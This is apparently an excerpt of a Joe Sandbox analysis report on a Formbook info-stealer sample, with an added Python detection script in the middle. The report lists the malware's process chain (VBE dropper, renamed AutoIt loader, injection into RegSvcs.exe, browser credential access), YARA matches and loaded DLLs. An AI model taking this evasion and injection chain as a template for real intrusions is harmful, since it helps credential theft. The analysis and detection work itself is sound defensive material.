            Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm 98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
            Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm.exe 98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: String function: 00D80DC0 appears 46 times
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: String function: 00D7FD60 appears 40 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 01425130 appears 58 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0146F290 appears 105 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 01437E54 appears 111 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 013DB970 appears 280 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0145EA12 appears 86 times
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Code function: String function: 00E857A5 appears 34 times
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Code function: String function: 00E86630 appears 31 times
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Code function: String function: 00E857D8 appears 67 times
            Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Code function: String function: 0465F290 appears 105 times
            Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Code function: String function: 04627E54 appears 111 times
            Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Code function: String function: 045CB970 appears 280 times
            Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Code function: String function: 0464EA12 appears 86 times
            Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Code function: String function: 04615130 appears 58 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5932 -s 80
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAutoIt3.exeB vs FS04dlvJrq.exe
            Source: FS04dlvJrq.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000017.00000002.3359416956.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000F.00000002.2646366966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000F.00000002.2647309588.0000000001800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000016.00000002.3357840971.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000016.00000002.3355319843.00000000022E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000016.00000002.3355834381.00000000027E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000015.00000002.3357716278.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000F.00000002.2647394884.0000000001870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@27/54@6/4
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Code function: 0_2_00E6932C GetLastError,FormatMessageW,_wcslen,LocalFree
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00DC194F AdjustTokenPrivileges,CloseHandle
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00DC1F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00DD5B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00DCDC9C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00DE4089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Code function: 0_2_00E7EBD3 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | File created: C:\Users\user\AppData\Roaming\uhex
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2580:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6468:120:WilError_03
            Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5932
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX0
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Command line argument: 0T (0_2_00E8454A)
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Command line argument: sfxname (0_2_00E8454A)
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Command line argument: sfxstime (0_2_00E8454A)
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Command line argument: STARTDLG (0_2_00E8454A)
            Source: FS04dlvJrq.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | File read: C:\Windows\win.ini
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: EhStorAuthn.exe, 00000016.00000003.2885617630.00000000028D6000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3355997152.00000000028E1000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3355997152.00000000028D6000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3355997152.0000000002904000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: FS04dlvJrq.exe | ReversingLabs: Detection: 47%
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | File read: C:\Users\user\Desktop\FS04dlvJrq.exe
            Source: unknown | Process created: C:\Users\user\Desktop\FS04dlvJrq.exe "C:\Users\user\Desktop\FS04dlvJrq.exe"
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe"
            Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c bpqdpksed.icm vbepwhj.mp3
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm bpqdpksed.icm vbepwhj.mp3
            Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5932 -s 80
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | Process created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"
            Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
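The process chain listed above (SFX stub, WScript running a .vbe from the RarSFX0 temp folder, cmd.exe running ipconfig /release and /renew, the AutoIt binary renamed to .icm, RegSvcs.exe started with no arguments, EhStorAuthn.exe launched from a random-named Program Files (x86) directory, then Firefox) is the part of this sample's behaviour that is visible in plain process-creation telemetry. The Python script below is an added example, not part of the Joe Sandbox report: it encodes those parent/child relationships as detection rules and runs them over event records constructed from the report's own "Process created" lines. The ProcEvent fields, the rule names, the path heuristics (30+ alphanumeric characters for a "random" directory name) and the benign explorer.exe control record are assumptions made for the example.

```python
"""Parent/child process-chain rules for the FS04dlvJrq.exe run.

Added example, not from the Joe Sandbox report. The ProcEvent records are
constructed from the report's 'Process created' lines; field names, rule
names, thresholds and the benign control record are assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str   # image path of the creating process
    image: str    # image path of the created process
    cmdline: str  # command line of the created process


# Constructed from the report's process list; paths and commands as listed there.
EVENTS = [
    ProcEvent(r"C:\Users\user\Desktop\FS04dlvJrq.exe",
              r"C:\Windows\SysWOW64\wscript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe"'),
    ProcEvent(r"C:\Windows\SysWOW64\wscript.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c ipconfig /release'),
    ProcEvent(r"C:\Windows\SysWOW64\wscript.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c bpqdpksed.icm vbepwhj.mp3'),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe",
              r"C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm",
              r"bpqdpksed.icm vbepwhj.mp3"),
    ProcEvent(r"C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"'),
    ProcEvent(r"C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe",
              r"C:\Windows\SysWOW64\EhStorAuthn.exe",
              r'"C:\Windows\SysWOW64\EhStorAuthn.exe"'),
    ProcEvent(r"C:\Windows\SysWOW64\EhStorAuthn.exe",
              r"C:\Program Files\Mozilla Firefox\firefox.exe",
              r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'),
    # Benign control (constructed, not in the report): a user opening Firefox from the shell.
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Program Files\Mozilla Firefox\firefox.exe",
              r'"C:\Program Files\Mozilla Firefox\firefox.exe"'),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
# .NET utilities that AutoIt/Formbook loaders commonly hollow; started with no arguments.
HOLLOW_TARGETS = {"regsvcs.exe", "regasm.exe", "msbuild.exe", "installutil.exe"}
EXEC_EXTENSIONS = (".exe", ".com", ".scr", ".pif")
TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")
SYSTEM_DIRS = ("\\windows\\system32\\", "\\windows\\syswow64\\")
# Heuristic: a single alphanumeric directory name of 30+ characters directly under Program Files (x86).
RANDOM_PF_DIR = re.compile(r"\\program files( \(x86\))?\\[a-z0-9]{30,}\\", re.I)
TEMP_SCRIPT = re.compile(r"\\temp\\.*\.vb[es]\b", re.I)
IPCONFIG = re.compile(r"\bipconfig\s+/(release|renew)\b", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def under(path: str, dirs: tuple[str, ...]) -> bool:
    low = path.lower()
    return any(d in low for d in dirs)


def check(ev: ProcEvent) -> list[str]:
    """Return the names of the rules that fire for one process-creation event."""
    parent, child = basename(ev.parent), basename(ev.image)
    hits: list[str] = []
    if child in SCRIPT_HOSTS and TEMP_SCRIPT.search(ev.cmdline):
        hits.append("script host executing a VBE/VBS script from a temp folder")
    if parent in SCRIPT_HOSTS and child == "cmd.exe":
        hits.append("script host spawned cmd.exe")
        if IPCONFIG.search(ev.cmdline):
            hits.append("ipconfig /release or /renew from a script-driven cmd.exe")
    if under(ev.image, TEMP_DIRS) and not child.endswith(EXEC_EXTENSIONS):
        hits.append("temp-dir executable with a non-executable extension")
    if (child in HOLLOW_TARGETS and under(ev.parent, TEMP_DIRS)
            and ev.cmdline.strip('"').lower().endswith(child)):
        hits.append(".NET utility started with no arguments by a temp-dir parent")
    if RANDOM_PF_DIR.search(ev.parent) and under(ev.image, SYSTEM_DIRS):
        hits.append("system binary started from a random-named Program Files (x86) directory")
    if child in BROWSERS and under(ev.parent, SYSTEM_DIRS):
        hits.append("browser started by a process in a Windows system directory")
    return hits


def scan(events: list[ProcEvent]) -> list[tuple[str, str, list[str]]]:
    """Events that fired at least one rule, as (parent name, child name, rule names)."""
    return [(basename(e.parent), basename(e.image), h) for e in events if (h := check(e))]


if __name__ == "__main__":
    for parent, child, rules in scan(EVENTS):
        print(f"{parent} -> {child}: {'; '.join(rules)}")
```

Run stand-alone it prints one line per flagged event; every one of the seven report-derived events fires at least one rule and the explorer.exe control fires none. The conhost.exe and WerFault.exe children from the report are deliberately left out of the sample set because they occur in benign runs too; the rules only key on relationships that the report's signatures (WScript dropper, script execution from a temp folder, ipconfig use, injection into RegSvcs.exe, browser credential access) already call out.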
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: dxgidebug.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: sfc_os.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: dwmapi.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: textshaping.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: edputil.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: policymanager.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: msvcp110_win.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: appresolver.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: slc.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: sppc.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: pcacli.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: windows.fileexplorer.common.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: ntshrui.dll
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Section loaded: cscapi.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
